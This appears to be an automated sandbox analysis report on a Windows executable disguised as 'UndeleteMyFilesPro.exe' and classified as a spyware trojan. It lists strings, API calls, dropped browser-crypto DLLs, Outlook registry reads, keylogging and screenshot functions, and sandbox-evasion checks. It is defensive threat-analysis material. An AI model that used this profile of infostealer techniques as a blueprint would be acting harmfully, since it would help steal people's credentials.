Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: fXg8zgxVTF.exe, 00000000.00000003.2263727445.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, GHIJJJEG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org#
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: IJDBGDGCGDAKFIDGIDBFIEHDHJ.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: fXg8zgxVTF.exe, 00000000.00000002.2369187585.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2390883557.0000000027B9D000.00000004.00000020.00020000.00000000.sdmp, JKFCBAEHCAEGDHJKFHJK.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044C100 GetWindowLongW,GetClientRect,InvalidateRect,SetWindowLongW,BeginPaint,EndPaint,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetSysColor,CreateSolidBrush,FillRect,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,DefWindowProcW, 0_2_0044C100
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00410C6C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 0_2_00410C6C
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00414E54 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,GetTickCount,ReleaseCapture, 0_2_00414E54
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044E1D0: DeviceIoControl, 0_2_0044E1D0
Detected potential crypto function
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418E1A 0_2_00418E1A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004190F1 0_2_004190F1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043801E 0_2_0043801E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043A2BE 0_2_0043A2BE
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00438562 0_2_00438562
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004125F4 0_2_004125F4
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A581 0_2_0042A581
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041863E 0_2_0041863E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042AA56 0_2_0042AA56
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00438AA6 0_2_00438AA6
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418B59 0_2_00418B59
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418B79 0_2_00418B79
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0044EDE0 0_2_0044EDE0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00418E5F 0_2_00418E5F
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042AE2A 0_2_0042AE2A
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043919E 0_2_0043919E
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042B236 0_2_0042B236
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: String function: 0042A2F0 appears 36 times
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: String function: 0042A1E6 appears 59 times
PE / OLE file has an invalid certificate
Source: fXg8zgxVTF.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: fXg8zgxVTF.exe, 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396304943.000000006CB42000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe, 00000000.00000002.2396603147.000000006CD35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs fXg8zgxVTF.exe
Source: fXg8zgxVTF.exe Binary or memory string: OriginalFilenameUndeleteMyFilesPro.exe@ vs fXg8zgxVTF.exe
Uses 32bit PE files
Source: fXg8zgxVTF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fXg8zgxVTF.exe Binary or memory string: Access DatabasesT*.txt; *.wpd; *.wp; *.wri; *.log; *.text; *.cpp; *.hpp; *.c; *.h; *.cs; *.xml; *.slnZ*.gif; *.bmp; *.jpg; *.png; *.jpeg; *.tif; *.tiff; *.psd; *.wmf; *.emf; *.ai; *.eps; *.icoR*.mp3; *.mpg; *.mpeg; *.mp2; *.avi; *.asf; *.wav; *.ram; *.wma; *.wmv; *.wm; *.mov-*.exe; *.com; *.sys; *.bat; *.pif; *.js; *.vb
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00454E40 GetVolumeInformationW,GetDiskFreeSpaceExW,__wcsnicmp,CloseHandle,ExitThread,CloseHandle,ExitThread,GetLastError,CloseHandle,ExitThread,ExitThread, 0_2_00454E40
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00444310 FindResourceW,LoadResource, 0_2_00444310
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QSSGA8L6.htm Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Command line argument: 2C 0_2_00433230
Source: fXg8zgxVTF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: fXg8zgxVTF.exe, 00000000.00000003.2273216856.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2272867708.0000000021A5D000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000003.2263408781.0000000021A69000.00000004.00000020.00020000.00000000.sdmp, HDGCGHIJKEGIECBFCBAE.0.dr, AFCBFIJEHDHCBGDGDGCB.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: fXg8zgxVTF.exe, 00000000.00000002.2385406489.000000001BAE1000.00000004.00000020.00020000.00000000.sdmp, fXg8zgxVTF.exe, 00000000.00000002.2396047101.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: fXg8zgxVTF.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: fXg8zgxVTF.exe Static file information: File size 9743208 > 1048576
Source: fXg8zgxVTF.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x8b8e00
Source: fXg8zgxVTF.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396479769.000000006CCEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: fXg8zgxVTF.exe, 00000000.00000002.2396257880.000000006CB2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\wrk\umfen\Release\UndeleteMyFilesPro.pdb source: fXg8zgxVTF.exe
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_004570F0 LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary, 0_2_004570F0
PE file contains an invalid checksum
Source: fXg8zgxVTF.exe Static PE information: real checksum: 0x367862 should be: 0x958427
PE file contains sections with non-standard names
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A2BE push ecx; ret 0_2_0042A2D1
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0042A335 push ecx; ret 0_2_0042A348
Drops PE files
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0040E252 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_0040E252
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: GetCursorPos,Sleep, 0_2_00443540
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe API coverage: 0.3 %
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0041C243 __EH_prolog3_GS,GetFullPathNameW,_DebugHeapAllocator,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,_DebugHeapAllocator, 0_2_0041C243
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452350 lstrcpyW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcpyW,RegCloseKey,lstrcatW,lstrcatW,RegOpenKeyW,RegEnumKeyW,RegCloseKey,lstrcatW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00452350
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_0043E4B0 lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcpyW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindClose, 0_2_0043E4B0
Source: C:\Users\user\Desktop\fXg8zgxVTF.exe Code function: 0_2_00452640 RegOpenKeyW,RegQueryValueExW,RegCloseKey,RegCloseKey,lstrcpyW,lstrlenW,lstrcpyW,FindFirstFileW,FindNextFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_00452640
